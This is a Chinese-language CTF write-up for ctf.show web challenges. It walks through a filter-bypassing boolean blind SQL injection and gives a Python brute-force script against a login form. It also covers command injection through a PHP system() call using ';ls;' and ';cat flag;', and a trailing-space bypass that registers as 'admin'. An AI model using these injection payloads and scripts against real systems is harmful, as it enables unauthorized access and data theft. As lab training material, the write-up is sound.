目录
0x2f666c6167是/flag得hex编码 ,用于更改cookie的值
发现页面都没什么可利用的,尝试访问别的页面,用dirsearch可以扫描出/admin/目录,没错,是扫出目录而不是一个页面,所以访问的时候别忘记admin后面加/
(多么菜的领悟>_<)
来到一个登录页面,随手试试or和and,返回要报警的信息,用burp来Fuzz一下 发现and or # - if =等都被过滤了
但( ) || , substr length可以用,||可以代替or 那么就是bool盲注了
经过尝试是会发现有三种返回信息:
用户名/密码错误
密码错误
用户名错误
'||'a'<'b 密码错误(说明账号对了,也就是我们盲注成功的信息)
'||'a'<'a 用户名/密码错误
'||aaaaaaaaaaaaaaaaaaaaa 用户名错误(用户名长度超过20即会此报错)
这里'||'a'<'b b后面没有引号,不然就注释掉密码了
因为length()没被ban,且数据包中密码位置传递的字符是p我们可以尝试爆破出密码的长度(当然,不搞这个也不影响盲注的,只是说有这种操作且会更省时间)
yinwe
密码长度小于18时只说密码错误,所以密码的长度是17位,方便一会盲注
import requests
url="http://bd496888-a33e-413e-8ef0-712a9e48f66f.challenge.ctf.show/admin/checklogin.php"
letter="0123456789abcdefghijklmnopqrstuvwxyz"
flag=""
for i in range(1,18):
for j in letter:
payload="'||substr(p,{},1)<'{}".format(i,j) 就是把i,j的值填入括号,也就是账号填入的东西
#print(payload)
data={ //输入的账号密码值
'u':payload,
'p':1
}
res=requests.post(url=url,data=data).text
print(res)
if "密码错误" == res:
flag += chr(ord(j)-1) 因为显示密码错误都是正确的下一个,所以这就是找上一个
print(flag)
break
# if j=='}':
# exit
这样就可以获得密码,账号是admin 就可以获得ctfshow{82228c30-589a-4ca4-8ff2-f0536b854236}
<?php
if(isset($_GET['url'])){
system("curl https://".$_GET['url'].".ctf.show");
}else{
show_source(__FILE__);
}
有system函数在,应该就是命令执行了。唯一注意的点就是分号分隔一下。
用;ls;查看flag文件,再用;cat flag;得到flag。
<?php
session_start();
include('config.php');
if(empty($_SESSION['name'])){
show_source("index.php");
}else{
$name=$_SESSION['name'];
$sql='select pass from user where name="'.$name.'"';
echo $sql."<br />";
system('4rfvbgt56yhn.sh');
$query=mysqli_query($conn,$sql);
$result=mysqli_fetch_assoc($query);
if($name==='admin'){
echo "admin!!!!!"."<br />";
if(isset($_GET['c'])){
preg_replace_callback("/\w\W*/",function(){die("not allowed!");},$_GET['c'],1);
echo $flag;
}else{
echo "you not admin";
}
}
}
?>
看代码有个数据库的操作,而且需要$name=admin
我们看login.php和register.php两个文件。
显然是让我们先注册,再登录,试了一下
如果要我们$name=admin,必须登录admin
发现admin登陆不上,于是
绕过$name='admin'
我们注册,admin空格
然后登录adminurlencode的空格编码为+或者%20
接下来是绕过c
[\s]表示,只要出现空白就匹配
[\S]表示,非空白就匹配
\w 匹配包括下划线的任何单词字符。等价于“[A-Za-z0-9_]"。
\W 匹配任何非单词字符。等价于“[^A-Za-z0-9_]"。
我们直接不传c的值就可以了。